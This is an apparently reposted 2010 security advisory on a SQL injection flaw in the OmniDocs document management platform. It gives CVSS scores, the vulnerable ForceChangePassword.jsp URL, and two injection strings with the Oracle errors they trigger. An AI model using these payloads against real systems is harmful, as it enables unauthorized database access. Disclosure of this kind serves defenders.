Omnidocs SQL injection Vulnerability

2010.02.28
Credit: thebluegenius
Risk: High
Local: No
Remote: Yes
CWE: CWE-89


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

-------------------------------------------------------------------- # Exploit Title: Omnidocs SQL injection Vulnerability # Date: 10 Feb 2010 # Author: thebluegenius # Software Link: http://www.newgensoft.com/omnidocs.asp # Version: All # Tested on: Apache-Coyote/1.1 | JBoss # CVE : NA --------------------------------------------------- "Omnidocs" SQL injection vulnerability. --------------------------------------------------- By :Thebluegenius. Email :rajsm@isac.org.in Blog :thebluegenius.com. --------------------------------------------------- Description: OmniDocs is an Enterprise Document Management (EDM) platform for creating, capturing, managing, delivering and archiving large volumes of documents and contents. Also integrates seamlessly with other enterprise applications. ------------------ Vulnerability ------------------ Affected URL: http://IPaddressOrDomain/omnidocs/ForceChangePassword.jsp Command: ' or 'a' = 'a' Confirmed SQL Injection error : ORA-00907: missing right parenthesis Command: or exists (select 1 from sys.dual) and ''x''=''x' Confirmed SQL Injection error : ORA-01756: quoted string not properly terminated ----------------------------------------------------- Greetz Fly Out to: 1] Amforked() : My good friend 2] Aodrulez : for inspiring me 3] www.OrchidSeven.com 4] www.isac.org.in

References:

http://xforce.iss.net/xforce/xfdb/56237
http://www.securityfocus.com/bid/38304
http://www.exploit-db.com/exploits/11393
http://secunia.com/advisories/38527
http://packetstormsecurity.org/1002-exploits/omnidocs-sql.txt
http://osvdb.org/62403


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top